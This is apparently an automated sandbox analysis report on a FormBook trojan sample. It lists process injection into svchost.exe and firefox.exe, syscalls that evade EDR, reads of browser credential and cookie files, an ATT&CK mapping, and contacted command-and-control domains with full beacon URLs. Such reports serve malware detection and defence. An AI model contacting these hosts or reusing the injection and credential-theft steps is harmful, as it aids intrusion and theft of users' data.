                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68EF5 mov eax, dword ptr fs:[00000030h]2_2_02D68EF5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36EE0 mov eax, dword ptr fs:[00000030h]2_2_02D36EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36EE0 mov eax, dword ptr fs:[00000030h]2_2_02D36EE0
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E7A66C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E681AC
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E68189 SetUnhandledExceptionFilter,0_2_00E68189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\icsunattend.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeThread register set: target process: 2260Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeThread APC queued: target process: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeJump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2355008Jump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7B106 LogonUserW,0_2_00E7B106
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E43D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E43D19
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E8411C SendInput,keybd_event,0_2_00E8411C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E874E7 mouse_event,0_2_00E874E7
                Source: C:\Users\user\Desktop\Fi#U015f.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Fi#U015f.exe"Jump to behavior
                Source: C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E7A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E7A66C
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E871FA
                Source: hnmibsTvfR.exe, 00000004.00000000.2476741162.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302971750.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3303735679.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Fi#U015f.exe, hnmibsTvfR.exe, 00000004.00000000.2476741162.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302971750.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3303735679.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: hnmibsTvfR.exe, 00000004.00000000.2476741162.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302971750.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3303735679.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Fi#U015f.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: hnmibsTvfR.exe, 00000004.00000000.2476741162.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000004.00000002.3302971750.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, hnmibsTvfR.exe, 00000007.00000002.3303735679.0000000000DB1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E665C4 cpuid 0_2_00E665C4
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E9091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00E9091D
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00EBB340 GetUserNameW,0_2_00EBB340
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E71E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E71E8E
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E5DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E5DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3301917962.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3303084240.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Fi#U015f.exeBinary or memory string: WIN_81
                Source: Fi#U015f.exeBinary or memory string: WIN_XP
                Source: Fi#U015f.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: Fi#U015f.exeBinary or memory string: WIN_XPe
                Source: Fi#U015f.exeBinary or memory string: WIN_VISTA
                Source: Fi#U015f.exeBinary or memory string: WIN_7
                Source: Fi#U015f.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.2140000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3303150675.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552287327.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552706561.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2552000811.0000000002140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3303269624.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3301917962.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3303084240.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E98C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E98C4F
                Source: C:\Users\user\Desktop\Fi#U015f.exeCode function: 0_2_00E9923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E9923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562311 Sample: Fi#U015f.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 28 www.aktmarket.xyz 2->28 30 www.nartex-uf.online 2->30 32 5 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 Fi#U015f.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 hnmibsTvfR.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 icsunattend.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 hnmibsTvfR.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 funnystory.online 172.104.82.74, 49812, 80 LINODE-APLinodeLLCUS United States 22->34 36 www.nartex-uf.online 31.31.196.177, 49838, 49845, 49855 AS-REGRU Russian Federation 22->36 38 www.a1shop.shop 13.248.169.48, 49877, 49883, 49892 AMAZON-02US United States 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Fi#U015f.exe74%ReversingLabsWin32.Trojan.AutoitInject
                Fi#U015f.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://files.reg.ru/fonts/inter/Inter-Medium.woff2)0%Avira URL Cloudsafe
                http://www.a1shop.shop0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)0%Avira URL Cloudsafe
                https://2domains.ru0%Avira URL Cloudsafe
                http://www.a1shop.shop/5cnx/?Zvupu44p=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+EUlRRQZaMEAQAdSQfgWtonXK7S514myqW5G+fyl7DTuYQ==&RhqLA=IdOhgVq0%Avira URL Cloudsafe
                http://www.nartex-uf.online/9ul0/0%Avira URL Cloudsafe
                https://server194.hosting.reg.ru/manager0%Avira URL Cloudsafe
                http://www.a1shop.shop/5cnx/0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/4mbo/?RhqLA=IdOhgVq&Zvupu44p=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e8GQOUHjh0/XAeWf+xbcrSf/780Hk7JHgoJ90GAMQodVPQ==0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Medium.woff)0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Regular.woff)0%Avira URL Cloudsafe
                http://funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo0%Avira URL Cloudsafe
                http://www.funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgk/nttef79vSlz7njgVLZEtWvcnUQ3+FUHCaATxq3UQzYQ==0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/4mbo/0%Avira URL Cloudsafe
                http://www.nartex-uf.online/9ul0/?Zvupu44p=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeUAbCHLl0Y/2eq8XbxFkjwUJTy71Wn7hwUVQgvRbUyIDUA==&RhqLA=IdOhgVq0%Avira URL Cloudsafe
                https://files.reg.ru/fonts/inter/Inter-Regular.woff2)0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.nartex-uf.online
                31.31.196.177
                truetrue
                  unknown
                  www.aktmarket.xyz
                  13.248.169.48
                  truetrue
                    unknown
                    funnystory.online
                    172.104.82.74
                    truetrue
                      unknown
                      cssa.auction
                      107.167.84.42
                      truefalse
                        unknown
                        www.a1shop.shop
                        13.248.169.48
                        truetrue
                          unknown
                          www.cssa.auction
                          unknown
                          unknownfalse
                            unknown
                            www.funnystory.online
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.nartex-uf.online/9ul0/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.a1shop.shop/5cnx/?Zvupu44p=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+EUlRRQZaMEAQAdSQfgWtonXK7S514myqW5G+fyl7DTuYQ==&RhqLA=IdOhgVqtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.aktmarket.xyz/4mbo/?RhqLA=IdOhgVq&Zvupu44p=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e8GQOUHjh0/XAeWf+xbcrSf/780Hk7JHgoJ90GAMQodVPQ==true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.a1shop.shop/5cnx/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.aktmarket.xyz/4mbo/true
                              • Avira URL Cloud: safe
                              unknown
                              http://www.nartex-uf.online/9ul0/?Zvupu44p=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeUAbCHLl0Y/2eq8XbxFkjwUJTy71Wn7hwUVQgvRbUyIDUA==&RhqLA=IdOhgVqtrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.funnystory.online/2dyu/?RhqLA=IdOhgVq&Zvupu44p=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgk/nttef79vSlz7njgVLZEtWvcnUQ3+FUHCaATxq3UQzYQ==true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabicsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.a1shop.shophnmibsTvfR.exe, 00000007.00000002.3303040517.00000000007DB000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://duckduckgo.com/ac/?q=icsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoicsunattend.exe, 00000006.00000003.2739041253.000000000757E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
